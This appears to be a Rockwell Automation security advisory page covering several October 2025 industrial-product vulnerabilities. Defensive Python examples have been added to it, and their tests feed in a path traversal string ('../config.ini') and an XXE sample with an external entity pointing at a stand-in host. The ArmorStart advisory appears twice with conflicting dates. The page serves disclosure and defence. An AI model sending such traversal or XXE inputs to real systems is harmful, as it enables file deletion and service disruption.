
Rockwell Automation Security Advisories

We investigate all internally and externally reported security issues and publish security advisories for all validated security vulnerabilities. These advisories allow our customers and partners to assess the impact of the vulnerabilities and take appropriate action.

Welcome to the new Rockwell Automation Security Advisory portal. The paragraphs below describe our security advisory initiative.


We recently relocated all security advisories to this public-facing Security Advisory Portal, which is part of Rockwell Automation’s Trust Center. In the past, our security advisories were stored in the Rockwell Automation Knowledgebase and required authentication to obtain access. This new portal gives customers and partners easier access to advisories, which enables them to better manage the security posture of Rockwell Automation solutions.

Our new Security Advisory Portal includes search and filter functionality, so customers can more easily find advisories for their products. Security advisories now include Common Security Advisory Framework 2.0 (CSAF) content, a standard that supports automated ingestion of advisories and helps customers bring vulnerability management data into their tooling faster. Our security advisories also include Known Exploited Vulnerability (KEV) data: the US Cybersecurity & Infrastructure Security Agency (CISA) maintains the authoritative source of vulnerabilities exploited in the wild and lists them in the KEV catalog. We strongly encourage customers to use this information to prioritize remediation efforts within their vulnerability management processes.

These changes support our commitment to security and transparency. The legacy Industrial Security Advisory Index page in the Knowledgebase will remain accessible through mid-2024 to allow customers time to transition to the new portal. Customers will continue to receive email alerts based on their subscription preferences and can subscribe for alerts using the link on the Security Advisory portal.

Severity: High
SD1754 | FactoryTalk® Linx Privilege Escalation Vulnerabilities
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9067, CVE-2025-9068
Products: FactoryTalk® Linx
CVSS Scores (v3.1): 7.8, 8.5
CVSS Scores (v4.0): 7.8, 8.5
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: Yes

FactoryTalk® Linx Privilege Escalation Vulnerabilities

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

 

Product Description

FactoryTalk Linx is a modern, secure communications platform that delivers real-time control system data from Allen-Bradley devices to FactoryTalk and third-party software, optimized for Logix 5000 controllers and scalable from small setups to large distributed systems.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version
-----------------|-----|---------------------------|------------------------------
FactoryTalk Linx | CVE-2025-9067 | 6.40 and prior | 6.50 and later
FactoryTalk Linx | CVE-2025-9068 | 6.40 and prior | 6.50 and later

 

Security Issue Details

CVE ID: CVE-2025-9067
Impact: A security issue exists within the x86 Microsoft Installer File (MSI) installed with FTLinx. Authenticated attackers with valid Windows user credentials can initiate a repair and hijack the resulting console window. This allows a command prompt to be launched with SYSTEM-level privileges, giving full access to all files, processes, and system resources.
CVSS 3.1 Base Score: 7.8/10
CVSS 4.0 Base Score: 8.5/10
CWEs: CWE-268: Privilege Chaining
Known Exploited Vulnerability: No (Not listed in KEV database)

CVE ID: CVE-2025-9068
Impact: A security issue exists within the repair functionality of the Rockwell Automation Driver Package x64 Microsoft Installer File (MSI) installed with FTLinx. Authenticated attackers with valid Windows user credentials can initiate a repair and hijack the resulting console window for vbpinstall.exe. This allows a command prompt to be launched with SYSTEM-level privileges, giving full access to all files, processes, and system resources.
CVSS 3.1 Base Score: 7.8/10
CVSS 4.0 Base Score: 8.5/10
CWEs: CWE-268: Privilege Chaining
Known Exploited Vulnerability: No (Not listed in KEV database)

 

Mitigations and Workarounds

Customers using the affected software should consider installing the Microsoft patch to address the MSI issue and upgrade to version 6.50 or later if possible. Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

 

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

Glossary

  • MSI: Windows Installer package used to install, update, or remove software on Windows systems.
  • SYSTEM-level privileges: access or execution rights equivalent to the Windows operating system's highest authority, allowing full control over all processes, files, and configurations.

 

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

  • Subscribe to product security alerts
  • Review the current list of Rockwell Automation security advisories
  • Report a possible security issue in a Rockwell Automation product
  • Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT.

Email: rasecure@ra.rockwell.com

 

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

Severity: Critical
SD1756 | Comms - 1783-NATR Multiple Vulnerabilities
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-7328, CVE-2025-7329, CVE-2025-7330
Products: Comms - 1783-NATR
CVSS Scores (v3.1): 10
CVSS Scores (v4.0): 9.9
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments. 

 

Product Description

 

The 1783-NATR from Rockwell Automation is a configurable NAT (Network Address Translation) router that enables simple 1:1 IP address mapping between machine and control networks.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
-----------------|-----|---------------------------|-------------------------------|-------------------------
Comms - 1783-NATR | CVE-2025-7328 | 1.006 and prior | 1.007 and later | 1783-NATR
Comms - 1783-NATR | CVE-2025-7329 | 1.006 and prior | 1.007 and later | 1783-NATR
Comms - 1783-NATR | CVE-2025-7330 | 1.006 and prior | 1.007 and later | 1783-NATR

 

Security Issue Details

CVE ID: CVE-2025-7328
Impact: Multiple Broken Authentication security issues exist in the affected product, caused by missing authentication checks on critical functions. They could result in denial-of-service, admin account takeover, or NAT rule modification. Denial-of-service or NAT rule modification would stop devices from communicating through the NATR, and NAT rule modification could also direct device communication to incorrect endpoints. Admin account takeover could allow modification of the configuration and require physical access to restore.
CVSS 3.1 Base Score: 10/10
CVSS 4.0 Base Score: 9.9/10
CWEs: CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability: No (Not listed in KEV database)

CVE ID: CVE-2025-7329
Impact: A Stored Cross-Site Scripting security issue exists in the affected product that could allow a malicious user to view and modify sensitive data or make the web page unavailable. The vulnerability stems from missing special-character filtering and encoding. Successful exploitation requires the attacker to be able to update configuration fields behind the admin login.
CVSS 3.1 Base Score: 8.4/10
CVSS 4.0 Base Score: 8.5/10
CWEs: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Known Exploited Vulnerability: No (Not listed in KEV database)

CVE ID: CVE-2025-7330
Impact: A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the affected form, allowing unintended configuration modification if an attacker can convince a logged-in admin to visit a crafted link.
CVSS 3.1 Base Score: 8.0/10
CVSS 4.0 Base Score: 7.0/10
CWEs: CWE-352: Cross-Site Request Forgery (CSRF)
Known Exploited Vulnerability: No (Not listed in KEV database)
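The three issues above share one pattern: a state-changing web function that can be reached without an authentication check (CWE-306), a form that accepts a request without a CSRF token (CWE-352), and stored configuration fields rendered without output encoding (CWE-79). The following is an added example, not Rockwell Automation code and not a description of the 1783-NATR firmware, showing the three checks a device web handler needs so that each of those requests is refused. The `Session`, `Request` and `Device` classes, the NAT rule layout and the sample requests are all constructed for this illustration.

```python
# Added example: not Rockwell Automation code and not the 1783-NATR firmware.
# Models a device web interface applying the checks whose absence the advisory
# describes. Session, Request, Device and the NAT rule layout are constructed.
import hmac
import html
import secrets
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Session:
    user: str
    is_admin: bool
    # Per-session secret that a cross-site page cannot read or guess.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    path: str
    form: dict = field(default_factory=dict)
    session: Optional[Session] = None  # None models an unauthenticated client


class Device:
    def __init__(self):
        self.nat_rules = {}  # rule name -> (inside IP, outside IP)

    def _require_admin(self, req):
        """CWE-306 check: critical functions run only for an admin session."""
        if req.session is None or not req.session.is_admin:
            return 401
        return None

    def _require_csrf(self, req):
        """CWE-352 check: state-changing requests must carry the session's token.

        Only called after _require_admin, so req.session is never None here.
        compare_digest keeps the comparison constant-time.
        """
        sent = req.form.get("csrf_token", "")
        if not hmac.compare_digest(sent, req.session.csrf_token):
            return 403
        return None

    def set_nat_rule(self, req):
        """POST /nat/rule handler; returns an HTTP status code."""
        if req.method != "POST":
            return 405
        err = self._require_admin(req) or self._require_csrf(req)
        if err:
            return err
        self.nat_rules[req.form["name"]] = (req.form["inside"], req.form["outside"])
        return 200

    def render_rules(self):
        """CWE-79 check: every stored field is HTML-escaped when rendered."""
        rows = "".join(
            "<tr><td>%s</td><td>%s</td><td>%s</td></tr>"
            % (html.escape(name), html.escape(inside), html.escape(outside))
            for name, (inside, outside) in self.nat_rules.items()
        )
        return "<table>" + rows + "</table>"


def demo():
    """Exercise the three checks with constructed requests; returns the outcomes."""
    dev = Device()
    admin = Session(user="admin", is_admin=True)
    rule = {"name": "plc1", "inside": "192.168.1.10", "outside": "10.0.0.10"}
    results = {}
    # 1. No session at all: the request a missing CWE-306 check would accept.
    results["unauthenticated"] = dev.set_nat_rule(Request("POST", "/nat/rule", dict(rule)))
    # 2. Admin session but no token: what a forged cross-site form looks like.
    results["no_csrf_token"] = dev.set_nat_rule(Request("POST", "/nat/rule", dict(rule), admin))
    # 3. Admin session with the token: the legitimate path.
    results["legitimate"] = dev.set_nat_rule(
        Request("POST", "/nat/rule", dict(rule, csrf_token=admin.csrf_token), admin))
    # 4. A stored field containing markup is rendered inert.
    dev.set_nat_rule(Request("POST", "/nat/rule",
        {"name": "<b>hmi</b>", "inside": "192.168.1.11", "outside": "10.0.0.11",
         "csrf_token": admin.csrf_token}, admin))
    results["rendered"] = dev.render_rules()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The ordering matters: the authentication check runs first, so an unauthenticated client never reaches the CSRF comparison, and the CSRF check runs before any state is touched. Escaping at render time, rather than filtering at input time, means a field that was stored before the fix is still displayed safely.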


Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions should use our security best practices.

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited.
  • NAT (Network Address Translation): a method used to remap IP addresses by modifying network address information in packet headers.
  • Authentication: the process of verifying the identity of a user or system.
  • Denial-of-Service (DoS): an attack that disrupts the normal functioning of a system, often by overwhelming it with requests.
  • Cross-Site Request Forgery (CSRF): an attack that tricks a user into executing unwanted actions on a web application in which they are authenticated.
  • Stored Cross-Site Scripting (XSS): a vulnerability where malicious scripts are stored on the server and executed in the browser of users who access the affected content.
  • Broken Authentication: a vulnerability where authentication mechanisms are improperly implemented, allowing unauthorized access or control.



Severity: High
SD1753 | FactoryTalk View Machine Edition and PanelView Plus 7 Vulnerabilities
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9064, CVE-2025-9063
Products: FactoryTalk View Machine Edition, PanelView Plus 7
CVSS Scores (v3.1): 7.5, 7.3
CVSS Scores (v4.0): 8.7, 7.0
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

FactoryTalk View Machine Edition and PanelView Plus 7 Vulnerabilities

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

 

Product Description

FactoryTalk View Machine Edition is a versatile, machine-level HMI software that enables intuitive design, monitoring, and control of operator interfaces with superior graphics, runtime management, and scalable deployment across PanelView Plus and PC-based platforms.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
-----------------|-----|---------------------------|-------------------------------|-------------------------
FactoryTalk View Machine Edition | CVE-2025-9064 | FactoryTalk View ME versions earlier than V15.00 | FactoryTalk View ME V15.00 and later on ASEM 6300 IPCs; Patch BF31001; PanelView Plus 7 Performance Series B V14.103 firmware package | 9701M-VWSTNMT
PanelView Plus 7 Performance Series B | CVE-2025-9063 | PanelView Plus 7 Performance Series B V14.100 | PanelView Plus 7 Performance Series B V14.103 firmware package | 9701M-VWSTNMT

 

Security Issue Details

CVE ID: CVE-2025-9064
Impact: A path traversal security issue exists within FactoryTalk View Machine Edition, allowing unauthenticated attackers on the same network as the device to delete any file within the panel's operating system. Exploitation of this vulnerability depends on knowing the names of the files to be deleted.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability: No (Not listed in KEV database)
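An added example, not Rockwell Automation code and not a description of how FactoryTalk View ME processes file requests, of the containment check a file-deletion endpoint needs to close a path traversal issue of the CWE-22 kind described above: the user-supplied name is resolved against a fixed base directory and refused if the resolved path escapes it. The base directory, file names and the `delete_user_file` handler are constructed for this example; the check runs in a throw-away temporary directory so it can be executed safely.

```python
# Added example: not Rockwell Automation code and not FactoryTalk View ME's
# file handling. Shows the containment check a file-deletion endpoint needs
# to close a path traversal issue (CWE-22). Paths and file names are constructed.
import os
import tempfile
from pathlib import Path


class PathOutsideBase(ValueError):
    """The requested path resolves to a location outside the permitted directory."""


def resolve_within(base, user_path):
    """Resolve user_path relative to base, or raise if it escapes base.

    Both sides go through realpath so that '..' segments and symlinks are
    resolved before the comparison; commonpath then confirms the resolved
    target still lies beneath the resolved base.
    """
    if os.path.isabs(user_path) or os.path.splitdrive(user_path)[0]:
        raise PathOutsideBase(user_path)  # only base-relative names are valid
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    try:
        common = os.path.commonpath([base_real, candidate])
    except ValueError:  # different drives on Windows
        raise PathOutsideBase(user_path)
    if common != base_real:
        raise PathOutsideBase(user_path)
    return candidate


def delete_user_file(base, user_path):
    """Delete a file under base. Returns True if deleted, False if refused or absent."""
    try:
        target = resolve_within(base, user_path)
    except PathOutsideBase:
        return False
    if not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo():
    """Exercise the check in a throw-away directory; returns the outcomes."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "uploads")
        os.makedirs(base)
        Path(base, "report.txt").write_text("ok")
        Path(tmp, "config.ini").write_text("constructed")  # sibling of base
        results = {
            "traversal": delete_user_file(base, "../config.ini"),
            "absolute": delete_user_file(base, os.path.join(tmp, "config.ini")),
            "normal": delete_user_file(base, "report.txt"),
            "sibling_survives": os.path.exists(os.path.join(tmp, "config.ini")),
        }
    return results


if __name__ == "__main__":
    print(demo())
```

Comparing resolved paths, rather than searching the input string for `..`, is what makes the check hold against encoded or symlinked variants of the same escape; a string filter would have to anticipate every spelling.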

 

CVE ID: CVE-2025-9063
Impact: An authentication bypass security issue exists within the FactoryTalk View Machine Edition Web Browser ActiveX control. Exploitation of this vulnerability allows unauthorized access to the PanelView Plus 7 Series B, including access to the file system, retrieval of diagnostic information, event logs, and more.
CVSS 3.1 Base Score: 7.3/10
CVSS 4.0 Base Score: 7.0/10
CWEs: CWE-285: Improper Authorization
Known Exploited Vulnerability: No (Not listed in KEV database)
Alternate Mitigation: If updating to the latest software version is not possible, it is recommended to remove the Web Browser ActiveX Control.

 

Glossary

  • HMI (Human-Machine Interface): used in industrial automation as the link between human operators and the technology they use.
  • ASEM IPC: a line of industrial PCs designed for various applications in manufacturing and automation.

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions should use our security best practices.

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

 


Severity: High
SD1755 | Compact GuardLogix® 5370 Denial-Of-Service Vulnerability
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9124
Products: Compact GuardLogix® 5370
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

The security of our products is important to us as your industrial automation supplier. This security issue is being reported based on our commitment to customer transparency and improvement of all business environments. 

 

Product Description

 

The Compact GuardLogix® 5370 controller from Rockwell Automation is a midrange programmable automation controller that integrates safety and motion control over EtherNet/IP, offering scalable performance.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
-----------------|-----|---------------------------|-------------------------------|-------------------------
Compact GuardLogix® 5370 | CVE-2025-9124 | Version 30.012 and prior | Version 30.14 and later | 1769-L3xS

 

Security Issue Details

CVE ID: CVE-2025-9124
Impact: A denial-of-service security issue exists in the affected product. It stems from a fault that occurs when a crafted CIP unconnected explicit message is sent to the controller, which can result in a major non-recoverable fault.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-248: Uncaught Exception
Known Exploited Vulnerability: No (Not listed in KEV database)


Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions should use our security best practices.

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited.
  • Denial-of-Service (DoS): an attack that disrupts the normal functioning of a system, often by overwhelming it with requests.
  • Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly.



Severity: High
SD1752 | FactoryTalk® ViewPoint XXE to Denial-of-Service Vulnerability
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9066
Products: FactoryTalk® ViewPoint
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

FactoryTalk® ViewPoint XXE to Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

 

Product Description

FactoryTalk ViewPoint is a mobile-ready extension of FactoryTalk View that enables secure, browser-based access to HMI graphics, trends, and alarms from FactoryTalk View SE and PanelView Plus applications, allowing users to monitor and interact with systems remotely without installing client software.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Version | Affected Catalog Numbers
-----------------|-----|---------------------------|----------------------|-------------------------
Panel View Plus 7 Terminal | CVE-2025-9066 | Version 14 and prior | Panel View Plus 7 Standard and Panel View Plus 7 Performance Series A v12, v13, v14 patch AID BF30506 (firmware fix); Panel View Plus 7 Performance Series B V14.103 | 2711P-xxx22x9P, 2711P-xxx22x9P-B, 2711P-xxx22x9PK, 2711P-Txx22D9P-BSHK, 2711P-T12W22D9P-BMxxx

 

Security Issue Details

CVE ID: CVE-2025-9066
Impact: A security issue was discovered within FactoryTalk® ViewPoint that allows unauthenticated attackers to perform XML External Entity (XXE) injection. Certain SOAP requests can be abused to perform XXE, resulting in a temporary denial-of-service.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-611: Improper Restriction of XML External Entity Reference
Known Exploited Vulnerability: No (Not listed in KEV database)
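An added example, not Rockwell Automation code and not FactoryTalk ViewPoint's SOAP handling, of how an XML parser is hardened against the XXE class (CWE-611) described above: the parser refuses any DOCTYPE, entity declaration or external entity reference before document content is processed, so a message that would otherwise trigger an external fetch or a recursive entity expansion (the resource exhaustion behind the denial-of-service) is rejected instead of parsed. The SOAP-like messages and the `parse_safely` and `classify` helpers are constructed for this example; the handler attributes set on the parser are the real `xml.parsers.expat` callbacks.

```python
# Added example: not Rockwell Automation code and not FactoryTalk ViewPoint's
# SOAP handling. Hardens an XML parse against XXE (CWE-611) by refusing the
# constructs that make it possible. Messages below are constructed samples.
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Document carries a DTD, an entity declaration or an external reference."""


def parse_safely(data):
    """Parse bytes/str; return (root element name, [(element, text), ...]).

    Rejecting every DOCTYPE is the decisive check: a DTD is the only place an
    external entity (file or URL fetch) or a recursively expanding entity can
    be declared, and a SOAP body never needs one. The entity handlers below
    are defence in depth in case the DOCTYPE handler is ever disabled.
    """
    parser = expat.ParserCreate()
    elements = []
    stack = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML("entity declaration %r not allowed" % name)

    def external_entity_ref(context, base, sysid, pubid):
        raise UnsafeXML("external entity reference not allowed")

    def start(name, attrs):
        stack.append([name, ""])

    def chars(text):
        if stack:
            stack[-1][1] += text

    def end(name):
        elements.append((name, stack.pop()[1].strip()))

    # These attribute names are the real xml.parsers.expat callback hooks.
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return elements[-1][0], elements


# Constructed sample messages (not real ViewPoint traffic).
SOAP_OK = b"""<?xml version="1.0"?>
<Envelope><Body><GetTrend><Tag>Line1.Temp</Tag></GetTrend></Body></Envelope>"""

SOAP_WITH_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE Envelope [ <!ENTITY ext SYSTEM "http://example.invalid/entity.xml"> ]>
<Envelope><Body><GetTrend><Tag>&ext;</Tag></GetTrend></Body></Envelope>"""


def classify(data):
    """Return ('accepted', root), ('rejected', reason) or ('malformed', reason)."""
    try:
        root, _ = parse_safely(data)
        return ("accepted", root)
    except UnsafeXML as exc:
        return ("rejected", str(exc))
    except expat.ExpatError as exc:
        return ("malformed", str(exc))


if __name__ == "__main__":
    print(classify(SOAP_OK))
    print(classify(SOAP_WITH_DTD))
```

The rejection happens in the DOCTYPE callback, before any entity is expanded or any content handler runs, which is the property that matters for the denial-of-service case: the parser never does the expensive work. A service that legitimately needs a DTD would whitelist a fixed internal subset instead of disabling the check.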

 

Glossary

  • XXE (XML External Entity): a vulnerability that allows attackers to interfere with an application's XML processing by exploiting external entity references.
  • SOAP (Simple Object Access Protocol): a messaging protocol used for exchanging structured information in web services over HTTP or other protocols.
  • XML: a markup language used to encode documents that can be read by both humans and machines.
  • HMI (Human-Machine Interface): used in industrial automation as the link between human operators and the technology they use.

 

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions should use our security best practices.

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

 


Severity: High
SD1751 | ArmorStart® AOP Denial-of-Service Vulnerability
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9437
Products: ArmorStart® AOP
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

ArmorStart® AOP Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

 

Product Description

ArmorStart Distributed Motor Controllers are easy-to-deploy, on-machine motor control solutions that simplify installation and support EtherNet/IP™ networks for industrial automation systems.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
-----------------|-----|---------------------------|-------------------------------|-------------------------
ArmorStart® AOP | CVE-2025-9437 | V2.05.07 | Not Available | 280E, 281E, 284E

 

Security Issue Details

CVE ID: CVE-2025-9437
Impact: A security issue exists within the Studio 5000 Logix Designer add-on profile (AOP) for the ArmorStart Classic distributed motor controller, resulting in denial-of-service. This vulnerability is possible due to the input of invalid values into Component Object Model (COM) methods.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-248: Uncaught Exception
Known Exploited Vulnerability: No (Not listed in KEV database)

 

Mitigations and Workarounds

Customers using the affected software should use our security best practices.

Revision History

Revision | Date | Description
---------|------|------------
1.0 | October 14, 2025 | Initial release

 

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

·         Subscribe to product security alerts

·         Review the current list of Rockwell Automation security advisories

·         Report a possible security issue in a Rockwell Automation product

·         Learn more about the Rockwell Automation vulnerability policy

 

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

 

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

ArmorStart® AOP Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

ArmorStart Distributed Motor Controllers are easy-to-deploy, on-machine motor control solutions that simplify installation and support EtherNet/IP™ networks for industrial automation systems.

Affected products and solution

Affected Product: ArmorStart® AOP
CVE: CVE-2025-9437
Affected Software Version: V2.05.07
Corrected in Software Version: Not Available
Affected Catalog Numbers: 280E, 281E, 284E

Security Issue Details

CVE ID: CVE-2025-9437
Impact: A security issue exists within the Studio 5000 Logix Designer add-on profile (AOP) for the ArmorStart Classic distributed motor controller, resulting in denial-of-service. This vulnerability is possible due to the input of invalid values into Component Object Model (COM) methods.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-248: Uncaught Exception
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software should use our security best practices.

Revision History

Revision: 1.0
Date: September 9, 2025
Description: Initial release


Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

  • Subscribe to product security alerts
  • Review the current list of Rockwell Automation security advisories
  • Report a possible security issue in a Rockwell Automation product
  • Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com



High
SD1757 | 1715 EtherNet/IP Comms Module Denial-Of-Service Vulnerabilities
Published Date: October 14, 2025
Last Updated: October 14, 2025
CVE IDs: CVE-2025-9177, CVE-2025-9178
Products: 1715-AENTR EtherNet/IP Adapter
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 7.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The 1715 EtherNet/IP Communications Module is a fault-tolerant adapter designed for high-availability applications, enabling redundant I/O communication over EtherNet/IP.

Affected products and solution

Affected Product: 1715-AENTR EtherNet/IP Adapter
CVE: CVE-2025-9177
Affected Software Version: Version 3.003 and prior
Corrected in Software Version: Version 3.011 and later
Affected Catalog Numbers: 1715-AENTR

Affected Product: 1715-AENTR EtherNet/IP Adapter
CVE: CVE-2025-9178
Affected Software Version: Version 3.003 and prior
Corrected in Software Version: Version 3.011 and later
Affected Catalog Numbers: 1715-AENTR

Security Issue Details

CVE ID: CVE-2025-9177
Impact: A denial-of-service security issue exists in the affected product and version. The security issue stems from a high number of requests sent to the web server. This could result in a web server crash; however, this does not impact I/O control or communication. A power cycle is required to recover and utilize the webpage.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 7.7/10
CWEs: CWE-770: Allocation of Resources Without Limits or Throttling
Known Exploited Vulnerability: No (Not listed in KEV database)

CVE ID: CVE-2025-9178
Impact: A denial-of-service security issue exists in the affected product and version. The security issue is caused through CIP communication using crafted payloads. The security issue could result in no CIP communication with the 1715 EtherNet/IP Adapter. A restart is required to recover.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 7.7/10
CWEs: CWE-787: Out-of-bounds Write
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision: 1.0
Date: October 14, 2025
Description: Initial release


Glossary

